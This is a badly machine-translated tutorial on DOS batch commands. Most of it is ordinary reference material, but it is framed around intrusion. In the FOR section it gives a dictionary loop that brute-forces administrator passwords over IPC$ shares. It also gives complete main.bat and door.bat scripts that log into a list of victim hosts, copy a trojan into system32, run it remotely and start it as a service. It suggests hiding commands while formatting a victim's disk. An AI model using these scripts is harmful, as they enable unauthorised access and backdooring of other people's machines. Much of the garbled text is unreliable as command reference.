DOS advanced application

xiaoxiao2021-03-30  203

I. Simple batch internal command

Advanced use of batch! ! Tips! ! !

Everyone is very familiar!

The following introduces several knowledge points for batch:

1: Use the FC command to check the Tutan Tools:

First establish a batch file ATM.BAT: Write code: @echo off

DIR C: / Windows / System32 / *. EXE> C: /111.txt

DIR C: / Windows / System32 / *. DLL> C: /222.txt

2: Create a batch file WLTS.BAT write code: @echo off

DIR C: / Windows / System32 / *. DLL> C: /FINDEXE.TXT

DIR C: / Windows / System32 / *. EXE> C: /Finddll.txt

FC C: /111.txt C: /findexe.txt> C: /exe.txt

FC C: /222.txt C: /Finddll.txt> C: /DLL.TXT

This will run atm.bat on your machine.

In the future, when you suspect that there is a Trojan, you can see suspicious files when you go to C: /exe.txt and dll.txt! This is just a thinking! ! You can also use him to clear the junk file left when you uninstall the software! For example, in the registry!

2: Make a hard drive with the subste command!

example

Subst x: C: / 111

Where X is the folder of the drive letter 111 to establish a drive

3: Hide 3.5 drive with subste command

Subst H: C: / ATM and put the ATM folder to read only!

Restore: At the beginning - run -subst a: / d! !

1.echo command

Open the echo or close the request back function, or display the message. If there is no parameters, the echo command will display the current echo setting.

grammar

echo [{on | OFF}] [Message]

Sample: @echo off / echo hello world

In practical applications, we will combine this command and redirect symbol (also known as pipe symbols, generally >> ^) to implement the input of some commands to specific formats. This will be embodied in the later example .

2. @ 令

Indicates that @ later commands, in the invasion process (for example, using batch to format the enemy's hard drive) naturally not let the other party see the command you use.

Sample: @echo off

@echo now initializing the program, please wait a minite ...

@format x: / q / u / autoset (format This command is not available / y this parameter, gratifying that Microsoft has left an Autoset parameter to us, the effects and / Y are the same.)

3.goto command

The specified jump to the label. After finding the label, the program will process the command starting from the next row.

Syntax: goto label (Label is the parameter, specifies the row in the batch program to be turned.)

SAMPLE:

IF {% 1} == {} GOTO NOPARMS

IF {% 2} == {} goto noparms (if you don't understand, you don't understand, you will have a detailed explanation.)

@Rem Check Parameters if Null show usage

: NopArms

Echo usage: Monitor.bat Serverip portnumber

Goto end

The name of the label can be random, but it is best to make a meaningful letter, let me add one: used to indicate that this letter is a label, and the goto command is based on this: to find the next step to jump there. It is best to have some explanation that you will understand your intentions.

4.Rem Command

Comment command, quite with / * in the C language -------- * /, which does not be executed, just a role of a comment, easy to read and modify it later.

Rem message

Sample: @Rem Here Is The Description.

5.pause command

When you run the PAUSE command, the following message is displayed:

..

SAMPLE:

@echo off

: Begin

Copy a: *. * D: / back

Echo please put a new disk Into Driver A

PAUSE

Goto Begin

In this example, all files on the disk A in the drive A are copied to the D: / BACK. Display Note Tips When another disk is placed in the drive A, the PAUSE command will hang the program so that you can replace the disk and press any key to continue processing.

6.call command

Another batch program is called from a batch program and does not terminate the parent batch program. The call command accepts the label used as calling the target. If you use Call outside the script or batch file, it will not work on the command line.

grammar

Call [[Drive:] [PATH] FileName [BatchParameters]] [: label [arguments]]]]]

parameter

[Drive:} [PATH] FileName

Specifies the location and name of the batch program to be called. The filename parameter must have a .bat or .cmd extension.

7.Start command

Call external programs, all DOS commands and command line programs can be called by the start command.

Intrusion common parameters:

MIN starts when the window is minimized

Separate starts 16-bit Windows programs within separate spaces

High at the High Priority Category Start Application

RealTime starts an application at the RealTime priority category

Wait launches the app and waits it over

Parameters These are parameters transmitted to command / programs

When the execution application is a 32-bit GUI application, the cmd.exe does not equal the application to terminate the command prompt. If executed within the command script, the new behavior will not happen.

8.choice command

Choice Use this command to allow users to enter a character to run different commands. When using, you should add / c: parameters, C: After you should write the prompt that the characters can be entered, there is no space. Its return code is 1234 ...

Such as: Choice / C: DME DEFRAG, MEM, END

Will display

DEFRAG, MEM, END [D, M, E]?

SAMPLE:

The contents of Sample.bat are as follows:

@echo off

Choice / C: DME DEFRAG, MEM, END

IF Errorlevel 3 Goto Defrag (should judge the highest value of the value first)

IF Errorlevel 2 Goto Mem

IF Errotlevel 1 goto end

: defra *

*: / * OS / DEFRAG

Goto end

: MEM

MEM

Goto end

: END: END

Echo good bye

After this file runs, the DEFRAG, MEM, END [D, M, E]? The user can select D M E, then the IF statement will make a judgment, and D represents the block segment that executes the label DEFRAG, m means the execution label is MEM. The block, e represents a block that executes the label as an end, and each block is finally jumped to the END Number with goto End, and then the program will display good bye, the file ends. 9.if Command

The if indicates whether it is determined whether or not the specified condition is determined to determine the execution of different commands. There are three formats:

1, if "parameter" == "string" The command to be executed

If the parameter is equal to the specified string, the condition is established, run the command, otherwise run the next sentence. (Note is two equal numbers)

If IF "% 1" == "a" Format A:

IF {% 1} == {} GOTO NOPARMS

IF {% 2} == {} GOTO NOPARMS

2, if the ife file name to be executed

If you have a specified file, the condition is true, run the command, otherwise run the next sentence.

If exist config.sys edit config.sys

3, if ErrorleVel / if Not Errorlevel Digital Terminal To Perform

If the return code is equal to the specified number, the condition is established, run the command, otherwise run the next sentence.

If Errorlevel 2 Goto X2

The DOS program runs back a number to DOS, called error code errorlevel or returns, and the common return code is 0, 1.

10.FOR command

The for command is a complicated command, primarily for parameters to loop execute commands within the specified range.

When using the for command in the batch file, specify a variable, please use %% Variable

For {% variable | %% variable} in (set) do command [commandLineOptions]

% variable specifies a single letter replaceable parameter.

(SET) Specify one or a set of files. You can use wildcards.

Command specifies the command to execute each file.

Command-parameters specifies parameters or command line switches for a specific command.

When using the for command in the batch file, specify a variable, please use %% Variable

Not to use% Variable. The variable name is case sensitive, so% I is different from% i

If the command extension is enabled, the following additional for command format will be supported: for / D% Variable In (SET) Do Command [command-parameters] If the set contains wildcard, specify the matching name, not the file name match. FOR / R [[DRIVE:] PATH]% Variable In (SET) Do Command [Command-Check Take the directory tree in [Drive:] Path, pointing to the for statement in each directory. If there is no specified directory after / r, use the current directory. If the set is only one single point (.) Character, the directory tree is enumerated. FOR / L% Variable in (Start, Step, End) Do Command [Command-Para This set represents a digital sequence from the beginning to the end in incremental form. Therefore, (1, 1, 5) will produce sequences 1 2 3 4 5, (5, -1, 1) will produce a sequence (5 4 3 2 1). FOR / F ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") Do Command for / f ["Options"]% Variable in (Command) Do Command or if there is a usebackq option: for / f ["Options"]% variable in (file-set) Do Command for / f ["Options"]% variable in ("string") do command for / f [" Options "]% Variable In (Command) do command filenameset is one or more file names. Before proceeding to the next file in the filenameset, each file has been opened, read and processed. Processing includes reading a file, dividing it into a line of rows, and analyzing each line into zero or more symbols. The FOR cycle is then called with the resulting symbol string variable value. With the default, / f is separated from the first blank symbol of each line of each file. Skip blank lines. You can replace the default parsing operation by specifying an optional "Options" parameter. This band-quoted string includes one or more keywords that specify different parses options. These keywords are: eol = c - refers to the end of a row bet release character (one) Skip = n - refers to the number of rows ignored at the beginning of the file. Delims = xxx - Indicator jacket set. This default separator set replaces the space and the jumping. Tokens = x, y, m-n - means which symbols per row are passed to each iteration for itself. This will result in a range of additional variable names. Specify the last character as an asterisk in the M symbol string via the NTH symbol, then the additional variable will assign and accept the reserved text of the row in the last symbol. Usebackq - Specify new grammar has been used under the case: Perform a back quotation string as a command and the quotation marks characters are text string commands and allow the dual quotes to expand the file name in Fi. Sample1: for / f "eol =; tokens = 2, 3 * delims =,"% i in (myfile.txt) do command will analyze every line in MyFile.txt, ignore those lines that are headers with a semicolon, will The second and third symbols in the row are passed to the forpriology; with a tend to be used with / or a space symbol.

Note that the statement of this FOR program references% i to acquire the second symbol, reference% J to obtain the third symbol, refer to% K to get all the remaining symbols after the third symbol. For file names with spaces, you need to create files with double quotes. In this way, use dual quotes, you also need to use the UseBackQ option, otherwise, the dual quotation marks will be understood to be used as a string to define a certain analysis. % I is specifically description in the For statement,% J and% K are specifically demonstrated by the tokens = option. You can specify up to 26 symbols via tokens =, as long as you do not attempt to illustrate a variable above the letter Z or Z. Keep in mind that for variables are single letters, case sensitive and global; at the same time, there is not more than 52 or more. You can also use FOR / F analysis logic on adjacent strings; method is to enclose the filenameset between brackets with single quotes. Thus, the character serial will be regarded as a single input line in a file. Finally, you can use the for / f command to analyze the output of the command. The method is to turn the filenameset between brackets into a hind string. This string will be regarded as a command line, pass to a sub-cmd.exe, and its output will be grasped into memory and is used as a file analysis. Therefore, the following example: for / f "UseBackQ Delims =="% I in (`set`) Do @echo% i enumerate the name of the environment variable in the current environment. In addition, the replacement of the FOR variable reference has been enhanced. You can now use the following options: ~ i - Delete any quotation marks ("), expand% i% ~ FI - expand% i to a fully qualified path name% ~ Di - expand% i to a drive number% ~ pi - only expand% i to a path% ~ Ni - expand% i to a file name% ~ xi - expand% i to a file extension name% ~ Si - the extended path only contains short name% ~ AI - expand% i to file file attribute% ~ Ti - expand% i to file Date / time% ~ zi - expand% i to file size% ~ Path: i - Find column in the path environment The catalog of the variable and expand% i to the first fully qualified name. If the environment variable is not defined, or if the file is not found, this combined key can expand the empty string can combine the modifier to get multiple results:% ~ DPI - only expand% i to a drive letter and path% ~ nxi - only% i expand% i to a file name and extension% ~ fsi - only% i to a full path name with a short name ~ ** $ * ATH: I - Find the directory column in the path environment variable and expand% i to the found first drive letter and path.% ~ Ftzai - expand% i to the DIR of the similar output line in the above example In the middle,% I and PATH can be replaced by other effective values.% ~ Syntax is terminated with a valid FOR variable name. Select the larger write variable name of the% i is more readily read, and avoid confusion with the combination of regardless of case. MS's official help, let's take a few examples to specify the use of the for command in the invasion

Sample2: Use the for command to achieve the violent password cracking to a target Win2k host. We use NET USE // IP / IPC $ "Password" / u: "administrator" to attempt to connect with the target host, and write a password when successful. The most important command is a: for / f i% in (dict.txt) Do Net USE // IP / IPC $ "I%" / u: "administrator" uses I% to represent the password of Admin, in Dict.txt This is connected to the value of the I% with the NET USE command. Then passenger run results to find command - FOR / F I %% in (Dict.txt) do Net USE // IP / IPC $ "I %%" / u: "Administrator" | ": command successfully completed ">> D: /ok.txt, so Ko." Sample3: Have you ever had a large number of broilers waiting for you to go to the back door Trojan? When the number is particularly, it will become very depressed when the number is very happy :). The opening of the article talked to the use of batch files to simplify daily or repetitive tasks. So how do you implement it? Oh, you will understand it. The main order is only one: (when using the for command in the batch file, specify the variable using %% variable) @for / f "tokens = 1, 2, 3 delims =" %% I in (Victim.txt) do Start Call door.bat %% I %% J %% k tokens Usage See Sample1 above, here it represents the parameter% I% J% K in door.bat in order. CultiVate.bat is nothing more than using the NET USE command to create an IPC $ connection, and COPY Trojan back door to Victim, then use the return code (if Errorlever =) to filter the host of the back door, and echo, or echo to the specified file. Delims = indicates that the content in Vivtim.txt is separated by a space. I want to see this here, you must also understand what is what this Victim.txt is like. It should be arranged in accordance with the object expressed by the %% I %% J %% K, which is generally IP Password UserName.

Code: --------------- Cut Here The Save As a Batchfile (i call it main.bat) ----------------- ---------- @ec "% 1" == "" goto usage @for / f "tokens = 1, 2, 3 delims =" %% i in (Victim.txt) DO START CALL IPCHACK.BAT %% I %% J %% K @goto end: usage @echo run this bath in dos mode.or Just double-click it.: end ------------- - Cut Here Then Save as a Batchfile (I Call it main.bat) -------------------------------- ------------- Cut Here The Save As a Batchfile (I Call it door.bat) ---------------------- ------ @Net USE / /% 1 / IPC $% 3 / U: "% 2" @IF Errorlevel 1 goto failed @echo trying to establish the ipc $ connection .......... ok @copy windrv32. EXE / /% 1 / admin $ / system32 && if not errorlevel 1 echo ip% 1 user% 2 PWD% 3 >> ko.txt @P *** EC //% 1 c: /winnt/system32/windrv32.exe @P *** EC //% 1 Net Start Windrv32 && if Not Errorlevel 1 Echo% 1 Backdooored >> Ko.txt: failed @echo sorry can not connect to the victim. ----------- ------ Cut Here Ten Save as a batChfile (i call it door.bat) ------- ------------------------ This is just a prototype, two batch and back door procedures (windrv32.exe), P *** Ec.exe needs to be placed under the unified directory. Batch content can be expanded, for example: add to clear log DDOS, join the function of adding users to add users, more deeper, can make it automatically propagated (worm) Not much to describe, interested friends can study themselves. 2: No.2 II. How to use parameters in batch batch in batch files, usually from 1% to 9%, When there are multiple parameters, you need to move with Shift. This situation is not very common, we don't consider it.

Sample1: fomat.bat @echo off if "% 1" == "a" format A:: format @format A: / q / u / auotset @echo please insert another disk to driver a. @pause @goto fomat This example Used in continuously format a few floppy disk, so you need to enter fomat.bat a at the DOS window, huh, it seems to have a bit drawing snake to add ~ ^ _ ^ Sample2: When we want to build an IPC $ Connect, you always need to enter a The big string command, it is noticeable, so we better write some fixed commands to a batch, put the broiler ip password username to assign the parameters to this batch, so you don't have to play each time. @Echo off @NET USE / / 1% / IPC $ "2%" / u: "3%" Note, this PASSWORD is the second parameter.

@IF ERRORLVEL 1 Echo Connection Failed, use the parameter or simpler? You must learn ^ _ ^. No.3. How to use the Compound Command 1. & usage: The first command & second command [& Article 3 Commands ...] Methods can perform multiple commands simultaneously, regardless of whether the command is executed Sample: C: C: C:, Volume In Drive C Has No Label. Volume Serial Number IS 0078 -59fb Directory of C: / EX4RCH 2002-05-14 23:51

. 2002-05-14 23:51 .. 2002-05-14 23:51 14 Sometips.gif 2. && usage: The first command && second command [&& third command ...] can be performed with this method simultaneously, and will not perform the back command after touching the error, if there is no error All commands have been executed; Sample: C: /> DIR Z: && Dir C: / Ex4rch The System Cannot Find The Path Specified. C: /> DIR C: / EX4RCH && DIR Z: VOLUME IN Drive C Has No Label. Volume Serial Number IS 0078-59FB Directory of C: / EX4RCH 2002-05-14 23:55 . 2002-05-14 23:55 .. 2002-05-14 23:55 14 Sometips.gif 1 File (s) 14 bytes 2 Dir (s) 768, 671, 744 BYtes Free The System Cannot Find the path specified. It may be relatively simple when doing backup, such as: Dir file: //192.168.0.1/ Database / Backup.mdb && Copy File: //192.168.0.1/database/backup.mdb E: / Backup If the remote server In the backup.mdb file, you do not execute the copy command if the file does not exist. This usage can be replaced by IF EXIST :)